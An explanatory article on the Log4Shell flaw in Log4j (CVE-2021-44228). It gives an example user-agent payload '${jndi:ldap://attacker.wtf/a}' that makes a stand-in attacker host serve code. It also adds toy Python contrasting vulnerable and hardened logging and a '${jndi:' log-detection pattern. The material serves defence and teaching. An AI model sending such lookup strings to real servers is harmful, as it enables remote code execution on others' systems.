Logfile Vulnerability Log4Shell for RCE
--
This article briefly describes a critical zero-day vulnerability called Log4Shell in Log4j, the widely used Java logging library found in millions of Java applications reachable from the Internet. The vulnerability can be exploited even by unskilled attackers and results in remote code execution (RCE) whenever Log4j is used to write user-controlled data into a log file.
The vulnerability is one of the worst of 2021 and was rated as critical. It received a CVSS score of 10. CVSS is a metric for rating the severity of vulnerabilities, and 10 is the maximum value that can be assigned. The vulnerability was assigned the CVE number CVE-2021-44228.
Last update: 20th December, 2021
How Can an Attacker Exploit the Vulnerability?
Let’s assume you have a web application written in Java that logs the user agent of each request. You log this data because you use the data to create browser statistics for your web site in order to better optimize the web site.
If you use a vulnerable version of Log4j to log the user agents, an attacker could set the following string as the user agent of a request:
${jndi:ldap://attacker.wtf/a}
When your application logs this string, Log4j by default tries to interpret it. Here, Log4j performs a JNDI lookup: it sends a request through the Java Naming and Directory Interface (JNDI) to the attacker-controlled host attacker.wtf. The response contains malicious code, which is then executed.
Why Is It Possible?
Log4Shell is possible because Log4j has a feature called lookups. According to the documentation, “Lookups provide a way to add values to the log4j configuration at arbitrary places”. These arbitrary places also include the log message itself. On the one hand, lookups can be very simple. For instance, if the string ${java:version} is logged, it is replaced by the Java version (e.g. “Java version 11.0.11”). On the other hand, lookups can be quite complex, and resolving one can even involve network communication. The JNDI lookup is one such lookup.
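To make the mechanism behind the two sections above concrete, here is an added toy lookup engine (example code written for this article, not Log4j's own implementation). It resolves `${scheme:key}` tokens the way a configuration engine would, with a constructed `java` lookup table standing in for the real one; a `jndi` token is refused instead of contacting a server. The contrast between `log_vulnerable`, which runs the resolver over message content, and `log_hardened`, which writes the message verbatim (the behaviour of the fixed versions, where message lookups are disabled), shows exactly where the user-agent string from above would be interpreted. `find_jndi_lookups` is a simple detection helper run over constructed access-log lines; its function names and the log format are assumptions of this example.

```python
import re

# Matches ${scheme:key} tokens, e.g. ${java:version} or ${jndi:ldap://host/a}.
LOOKUP_RE = re.compile(r"\$\{([A-Za-z]+):([^}]*)\}")

# Constructed stand-in for what Log4j's 'java' lookup would return.
JAVA_LOOKUP = {
    "version": "Java version 11.0.11",
    "os": "Linux 5.10",
}


def resolve_lookups(text: str) -> str:
    """Expand lookup tokens in a configuration-style string.

    Only the local 'java' scheme is implemented. A 'jndi' scheme would require
    a network request to whatever host the token names, so this toy engine
    raises instead of performing it; unknown schemes are left untouched.
    """
    def expand(match: re.Match) -> str:
        scheme, key = match.group(1).lower(), match.group(2)
        if scheme == "java":
            return JAVA_LOOKUP.get(key, match.group(0))
        if scheme == "jndi":
            raise RuntimeError(f"refusing remote JNDI lookup: {match.group(0)}")
        return match.group(0)

    return LOOKUP_RE.sub(expand, text)


def log_vulnerable(message: str) -> str:
    """Pre-fix behaviour: the message body itself goes through the resolver,
    so user-controlled text such as a User-Agent header is interpreted."""
    return resolve_lookups(message)


def log_hardened(message: str) -> str:
    """Post-fix behaviour: message content is written exactly as received.
    Lookups may still be used in the logger configuration, never in data."""
    return message


def find_jndi_lookups(log_lines):
    """Detection helper: return the log lines that contain a JNDI lookup token
    (case-insensitive)."""
    pattern = re.compile(r"\$\{jndi:", re.IGNORECASE)
    return [line for line in log_lines if pattern.search(line)]


# Constructed sample access-log lines; the third carries the lookup string
# from the article in its User-Agent field.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "curl/7.79.1"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.wtf/a}"',
]

if __name__ == "__main__":
    print(log_vulnerable("started with ${java:version}"))
    print(log_hardened("User-Agent: ${jndi:ldap://attacker.wtf/a}"))
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print("suspicious:", hit)
    try:
        log_vulnerable("User-Agent: ${jndi:ldap://attacker.wtf/a}")
    except RuntimeError as err:
        print("vulnerable path attempted a lookup:", err)
```

Matching on `${jndi:` alone is a coarse check and only worth running as a triage step over existing logs; the reliable fix is upgrading Log4j to a version in which message lookups are removed, as the hardened logger above models.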